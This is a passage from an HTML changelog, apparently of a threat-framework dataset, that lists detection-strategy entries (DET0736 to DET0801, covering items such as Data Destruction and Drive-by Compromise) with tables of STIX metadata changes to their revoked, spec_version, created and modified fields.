collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.691000+00:00</td></tr></tbody></table></details><hr><h4>[DET0736] Detection of Commonly Used Port</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.674000+00:00</td></tr></tbody></table></details><hr><h4>[DET0759] Detection of Connection Proxy</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.684000+00:00</td></tr></tbody></table></details><hr><h4>[DET0762] Detection of Damage to Property</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.698000+00:00</td></tr></tbody></table></details><hr><h4>[DET0758] Detection of Data Destruction</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.697000+00:00</td></tr></tbody></table></details><hr><h4>[DET0754] Detection of Data from Information Repositories</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.686000+00:00</td></tr></tbody></table></details><hr><h4>[DET0749] Detection of Data from Local System</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.674000+00:00</td></tr></tbody></table></details><hr><h4>[DET0756] Detection of Default Credentials</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.688000+00:00</td></tr></tbody></table></details><hr><h4>[DET0786] Detection of Denial of Control</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.671000+00:00</td></tr></tbody></table></details><hr><h4>[DET0723] Detection of Denial of Service</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.668000+00:00</td></tr></tbody></table></details><hr><h4>[DET0769] Detection of Denial of View</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.669000+00:00</td></tr></tbody></table></details><hr><h4>[DET0768] Detection of Detect Operating Mode</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.696000+00:00</td></tr></tbody></table></details><hr><h4>[DET0801] Detection of Device Restart/Shutdown</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.671000+00:00</td></tr></tbody></table></details><hr><h4>[DET0782] Detection of Drive-by Compromise</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.684000+00:00</td></tr></tbody></table></details><hr><h4>[DET0742] Detection of Execution through API</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.697000+00:00</td></tr></tbody></table></details><hr><h4>[DET0740] Detection of Exploit Public-Facing Application</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.687000+00:00</td></tr></tbody></table></details><hr><h4>[DET0795] Detection of Exploitation for Evasion</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th 